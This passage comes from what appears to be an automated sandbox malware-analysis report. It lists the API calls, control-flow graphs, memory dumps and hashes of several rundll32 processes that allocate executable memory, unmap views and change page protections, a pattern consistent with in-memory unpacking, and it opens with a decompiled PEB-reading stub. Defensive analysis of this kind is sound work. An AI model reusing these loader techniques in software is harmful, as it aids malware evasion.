                                                                      				/* Reads the PEB pointer from the TEB at fs:[0x30] (32-bit process);
                                                                      				   this is the "Contains functionality to read the PEB" behaviour. */
                                                                      				return  *[fs:0x30];
                                                                      			}



                                                                      0x1000a829

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2115667176.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2115667176.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 20fed0 1174 20feed 1173->1174 1179 20f550 1174->1179 1176 20ff7c 1182 20fb30 VirtualAlloc 1176->1182 1178 20ffb3 1180 20f591 1179->1180 1181 20f5c4 VirtualAlloc 1180->1181 1181->1176 1183 20fb8e 1182->1183 1184 20fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 20fc50 1184->1185 1186 20fd7d 1185->1186 1187 20fd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0020FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0020FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0020FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2125387365.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1f0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 9fdc4fb799b8dd4d6516937c3b8d9a0b50453db996b821ba7d8b46caca1bdee7
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 77B19A75A00209DFCB48CF84D590AAEB7B5BF88304F208159E915AB396D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 20f550-20f59b call 20f960 42 20f5aa-20f5da call 20f330 VirtualAlloc 39->42 43 20f59d-20f5a7 call 20f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2125387365.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1f0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: add4b5f7604f8c744e810fa7c8dbaac25557e45ec33ca9fdd35ff973941817fc
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 8A113060D083CDEEEB01DBE884097EEBFB55B11704F044098D5446A283D2BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 11fed0 1174 11feed 1173->1174 1179 11f550 1174->1179 1176 11ff7c 1182 11fb30 VirtualAlloc 1176->1182 1178 11ffb3 1180 11f591 1179->1180 1181 11f5c4 VirtualAlloc 1180->1181 1181->1176 1183 11fb8e 1182->1183 1184 11fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 11fc50 1184->1185 1186 11fd7d 1185->1186 1187 11fd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0011FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0011FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0011FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0011FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2135297740.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 9fe7a9c9977b04f471e3bb1298656e988cb35bb49ba124f09ec1847d69351979
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: BDB1BAB5A00109DFCB48CF84D590EAEB7B5BF88304F208169E919AB345D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 11f550-11f59b call 11f960 42 11f5aa-11f5da call 11f330 VirtualAlloc 39->42 43 11f59d-11f5a7 call 11f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0011F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2135297740.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: e55c7decea02c9643cacb10e250befe015d009d3d3098331e5d237864bb570b0
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: C2113360D0828DEEEB01D7E884057EEBFB55B21704F0440A8E5486A282D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 18fed0 1174 18feed 1173->1174 1179 18f550 1174->1179 1176 18ff7c 1182 18fb30 VirtualAlloc 1176->1182 1178 18ffb3 1180 18f591 1179->1180 1181 18f5c4 VirtualAlloc 1180->1181 1181->1176 1183 18fb8e 1182->1183 1184 18fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 18fc50 1184->1186 1185 18fd7d 1185->1178 1186->1185 1187 18fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0018FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0018FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0018FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2147965109.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_170000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 39918c2dbd628486d70b19799d91e5fb63b7c1efa6b54dfaa6c75e8db99e171c
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 67B198B5A00109DFCB48DF84D590AAEB7B5BF88314F208159E919AB355D735EE82CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 18f550-18f59b call 18f960 42 18f5aa-18f5da call 18f330 VirtualAlloc 39->42 43 18f59d-18f5a7 call 18f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2147965109.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_170000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c61c6a7a7a381565e8d0ea874d5e99c4139e21a27dd140a877b963908e4bed99
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: AD113060D08289EEEB01D7E894097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 12fed0 1174 12feed 1173->1174 1179 12f550 1174->1179 1176 12ff7c 1182 12fb30 VirtualAlloc 1176->1182 1178 12ffb3 1180 12f591 1179->1180 1181 12f5c4 VirtualAlloc 1180->1181 1181->1176 1183 12fb8e 1182->1183 1184 12fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 12fc50 1184->1185 1186 12fd52 VirtualProtect 1185->1186 1187 12fd7d 1185->1187 1186->1185 1187->1178

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0012FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0012FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0012FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2157214578.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: a8ef30cf9dc0b6c118dad2a37b8a81712d49dcb17153fe9b9ad23c4ea647f355
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: E8B19A75A00109DFCB48CF84D590EAEB7B5BF88304F208169E919AB355D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 12f550-12f59b call 12f960 42 12f5aa-12f5da call 12f330 VirtualAlloc 39->42 43 12f59d-12f5a7 call 12f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2157214578.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 386ac353dc2f027dbf529e201855683646225776c1ed6e9d1923fde277413059
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 6A113060D08289EEEF01D7E894097EEBFB55B21708F0440A8E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage: 9.1%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 13
                                                                      Total number of Limit Nodes: 1

                                                                      Graph

                                                                      execution_graph 1173 15fed0 1174 15feed 1173->1174 1179 15f550 1174->1179 1176 15ff7c 1182 15fb30 VirtualAlloc 1176->1182 1178 15ffb3 1180 15f591 1179->1180 1181 15f5c4 VirtualAlloc 1180->1181 1181->1176 1183 15fb8e 1182->1183 1184 15fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 15fc50 1184->1186 1185 15fd7d 1185->1178 1186->1185 1187 15fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0015FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0015FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0015FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2166500104.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_140000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 3678889461ae79ab5f6f2c3c2d704cf9db129a931aaab9b95ad6dc9d99ebf8d0
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 00B199B5A00109DFCB48CF84D590EAEB7B5BF88305F208159E919AB355D735EE86CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 15f550-15f59b call 15f960 42 15f59d-15f5a7 call 15f960 39->42 43 15f5aa-15f5da call 15f330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2166500104.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_140000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 1fe9891d6473b53fcd1f9a3920e8e36e6697a99bc9a968b10ad4b09f152f81b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: C2113060D08289EEEF01D7E884097EEBFB55B21709F044098E9546B282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage: 9.1%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 13
                                                                      Total number of Limit Nodes: 1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2176639292.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2176639292.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage: 9.1%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 13
                                                                      Total number of Limit Nodes: 1

                                                                      Graph

                                                                      execution_graph 1173 14fed0 1174 14feed 1173->1174 1179 14f550 1174->1179 1176 14ff7c 1182 14fb30 VirtualAlloc 1176->1182 1178 14ffb3 1180 14f591 1179->1180 1181 14f5c4 VirtualAlloc 1180->1181 1181->1176 1183 14fb8e 1182->1183 1184 14fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 14fc50 1184->1185 1186 14fd7d 1185->1186 1187 14fd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0014FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0014FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0014FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2187603194.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 14f550-14f59b call 14f960 42 14f59d-14f5a7 call 14f960 39->42 43 14f5aa-14f5da call 14f330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2187603194.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage: 9.1%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 13
                                                                      Total number of Limit Nodes: 1

                                                                      Graph

                                                                      execution_graph 1173 12fed0 1174 12feed 1173->1174 1179 12f550 1174->1179 1176 12ff7c 1182 12fb30 VirtualAlloc 1176->1182 1178 12ffb3 1180 12f591 1179->1180 1181 12f5c4 VirtualAlloc 1180->1181 1181->1176 1183 12fb8e 1182->1183 1184 12fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 12fc50 1184->1185 1186 12fd52 VirtualProtect 1185->1186 1187 12fd7d 1185->1187 1186->1185 1187->1178

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0012FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0012FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0012FD70
                                                                      Memory Dump Source
